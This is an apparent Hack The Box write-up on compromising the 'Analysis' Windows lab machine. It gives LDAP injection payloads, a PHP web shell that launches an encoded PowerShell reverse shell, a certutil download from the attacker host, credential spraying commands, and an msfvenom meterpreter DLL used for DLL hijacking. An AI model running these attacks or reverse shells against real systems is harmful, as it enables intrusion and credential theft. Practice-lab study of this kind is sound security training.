Analysis: Hard Windows Box on Hack The Box

• 6 min read
HTB

A detailed walkthrough of the Hack The Box “Analysis” hard Windows machine, covering LDAP injection, web-based command execution, credential discovery, lateral movement, and domain compromise via DCSync abuse.

Overview of the Analysis Box

Engagement Phases

  1. Information gathering and reconnaissance
  2. Web service enumeration
  3. Web vulnerability analysis
  4. Initial access and web shell
  5. Lateral movement
  6. Privilege escalation

Phase I: Information Gathering

Initial Reconnaissance

Begin with a comprehensive nmap scan to identify active ports and services on the "Analysis" box.

Command:

nmap -sC -sV -O -T4 --min-rate=500 -oA nmap/analysis 10.10.11.250

Result Snapshot:

  • Host Response: 10.10.11.250 is up (Latency: 0.26s).
  • Majority of TCP Ports: Closed.
  • Open Ports and Services:
  • 53/tcp: Domain (Simple DNS Plus)
  • 80/tcp: HTTP (Microsoft HTTPAPI httpd 2.0)
  • 88/tcp: Kerberos Security (Microsoft Windows Kerberos)
  • 135/tcp: Microsoft Windows RPC
  • 139/tcp: NetBIOS Session (Microsoft Windows netbios-ssn)
  • 389/tcp: LDAP (Microsoft Windows Active Directory LDAP)
  • 445/tcp: Microsoft Directory Services
  • 464/tcp: kpasswd5
  • 593/tcp: Microsoft Windows RPC over HTTP
  • 636/tcp, 3269/tcp: TCP Wrapped
  • 3268/tcp: LDAP (Microsoft Windows Active Directory LDAP)
  • 3306/tcp: MySQL (unauthorized)
  • OS Detection: Inconclusive (Potential Windows OS)
  • Host Script Results:
  • SMB2 Protocol Negotiation Failed

Analysis: The scan reveals a typical Windows domain environment with services like Kerberos, LDAP, and Microsoft RPC. The unusual presence of a MySQL server and failed SMB2 negotiation suggest potential avenues for exploration.

Next Steps:

  1. DNS Mapping: Add analysis.htb to /etc/hosts.
  2. Web Application Assessment: Explore the web application on port 80 for vulnerabilities.
  3. Service Exploration: Investigate LDAP, Kerberos, and SMB services.

Phase II: HTTP Enumeration && Exploitation

Objective: Uncover web applications for initial access or crucial information.

After reviewing the analysis.htb landing page, which appeared largely static, the next step was to dig deeper for any potential entry points. analysis.htb

Tools & Techniques:

  1. DNS Enumeration: * Utilizing tools like dnsenum, gobuster, and custom bash scripts.
  2. Commands Used: * dnsenum: Enumerates DNS details.
dnsenum --dnsserver 10.10.11.250 --enum -p 0 -s 0 -o out.txt -f wordlist.txt analysis.htb
  • Gobuster: Brute-forces DNS subdomains.
gobuster dns -d analysis.htb -w wordlist.txt -r 10.10.11.250
  • Bash Script: Queries for subdomains.
for sub in $(cat wordlist.txt); do
dig $sub.analysis.htb @10.10.11.250 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a out.txt
done

Outcome & Analysis:

The primary goal at this stage was to discover subdomains that might expose additional services or web applications.

Next Steps:

  • Investigate any discovered subdomains.
  • Pay special attention to internal.analysis.htb for further exploration.

The main page on internal.analysis.htb consistently returned 403 responses, and most guessed directories produced 404 errors. To systematically uncover hidden directories and PHP files, dirsearch was used against internal.analysis.htb.

Visual Insight:

403 response on internal.analysis.htb

404 response on non-existent paths

As expected, no meaningful content was exposed through simple browsing.

Uncovering Hidden Gems

dirsearch -q -r -u http://internal.analysis.htb/ -i 200,300-399 -e php

Findings: Discovered several directories and files including login and user list endpoints.

After extensive enumeration, focus shifted to LDAP injection based on the earlier nmap results.

Visual Evidence:

Dirsearch output highlighting interesting endpoints

Parameter fuzzing:

  • Found name
ffuf -c -v -w parameters.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=test"
  • I discovered name is vulnerable to LDAP injection

Uncovering LDAP Injection

  1. Parameter Identification: * During the exploration of http://internal.analysis.htb/users/list.php, the name parameter was identified. * A critical observation was made that the name parameter was susceptible to LDAP injection.
  2. Exploiting LDAP Injection: * A series of rigorous fuzzing exercises were conducted on the name parameter. * The tools and techniques employed revealed two significant LDAP attributes: objectclass and description. * The successful LDAP query structure was identified as 
url?name=*)(%26(FUZZING=*)
url?name=*)(%26(objectClass=*)(FUZZING=*)
url?name=*)(%26(objectClass=*)(description=*)
# I think the full query like this
(&(name=*)(objectClass=*)(description=*))
  • Intriguingly, the objectClass attribute consistently held the value user, and the description attribute contained a lengthy string, interpreted as the password for the technician user.

To further exploit this discovery, a specialized script was utilized, significantly enhanced and optimized for this specific scenario. This custom script, available on Hunt3r0x's GitHub, was pivotal in extracting the complete password.

Script Usage:

python3 fuzzer.py --charset allchars-wordlist.txt

fuzzer SCRIPT USAGE

Once valid credentials were obtained in the Windows environment, the next step was to evaluate their validity across common protocols.

User Enumeration:

  • Employed kerbrute for user enumeration with discovered credentials.
# Warping users with DC 'analysis.htb'
sed -i "s|$|@analysis.htb|" users.txt
# Then
kerbrute userenum -d analysis.htb users.txt --dc analysis.htb
  • Found several users, including technician.

Kerbrute Output:

USERs ENUMERATION

Protocols Enumeration:

  • Used crackmapexec to enumerate protocols with technician credentials.
crackmapexec <$PROTOCOL> 10.10.11.250 -u 'technician' -p 'password'

for protocol in mssql smb ldap ftp winrm ssh rdp;do crackmapexec $protocol 10.10.11.250 -u 'technician' -p 'password';done

Nothing we found.

Web Login:

  • Successfully logged in using discovered credentials at http://internal.analysis.htb/employees/login.php.

Exploiting File Upload

  • Found and exploited a file upload function in the admin panel.
  • Uploading testing PHP code. 
<?php echo "<h1>HELLO \;</h1>";?>

EXPLOIT FILE UPLOAD 1

It's worked:

EXPLOIT FILE UPLOAD 1

Gaining reverse shell

// Uplaod this but make sure you put ur PS script
<?php system("powershell -e <PS script encoded with BASE64>")?>
// You can use https://www.revshells.com/

And fire up your netcat and visit the uploaded shell.

EXPLOIT FILE UPLOAD 2

netcat

rlwrap -cAr nc -lvnp <PORT>

Reverse shell: Gained shell access as svc_web, with the user flag owned by the jdoe account.

GOT REVERSE SHELL

Phase III: Privilege Escalation

Objective: To escalate privileges and gain higher level access on the system.

Techniques & Tools:

  1. Initial Lateral Movement: * Initially gained shell access as svc_web. * The user flag was under jdoe's ownership.
  2. PowerShell Script for Privilege Escalation: * Utilized the PrivescCheck PowerShell script. Upload the PS script to the machine
# First
## In your terminal
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
## And then open HTTP server
python3 -m http.server <PORT>
# Second
## In gained shell
certutil -urlcache -f http://<TUN0>:<PORT>/PrivescCheck.ps1 PrivescCheck.ps1
  • Executed the script with:
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML"
  • Discovered leaked credentials for jdoe in the winlogon registry key.

LEAKED CREDS

  1. Credential Validation with CrackMapExec: * Validated the discovered credentials using CrackMapExec.
crackmapexec <PROTOCOL> 10.10.11.250 -u 'user' -p 'password'

for protocol in mssql smb ldap ftp winrm ssh rdp;do crackmapexec $protocol 10.10.11.250 -u 'user' -p 'password';done
  • Confirmed the credentials' validity over the WinRM protocol.

CRACKMAPEXEC

  1. Accessing jdoe's Account with Evil-WinRM: * Gained access to jdoe account using Evil-WinRM:
evil-winrm -i 10.10.11.250 -u "jdoe" -p "password"

Successfully retrieved the user flag:

User flag obtained

At this stage, the focus shifted from initial foothold to full privilege escalation on the host.

  1. Exploiting CVE-2016-1417 for Administrator Access:
  • Identified the machine's vulnerability to CVE-2016-1417 (DLL hijacking in Snort 2.9.7.0-WIN32).
  • Created a DLL payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=1337 -f dll > tcapi.dll
  • Set up a listener in Metasploit:
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost TUN0
set lport 1337
run
  • Uploaded tcapi.dll to C:\snort\lib\snort_dynamicpreprocessor using jdoe's shell in Evil-WinRM.
upload tcapi.dll tcapi.dll # In Evil-WinRM
## If you got no access try to remove .dll files with
dell *.dll 
## Then
upload tcapi.dll tcapi.dll

Gaining Full Administrative Access

Administrative shell obtained

  • Successfully executed the DLL payload, exploiting the vulnerability.
  • Obtained a Meterpreter shell with administrative privileges through DLL hijacking.

Related Reports

Bizness (Hack The Box) Walkthrough

January 06, 2024
Read Report →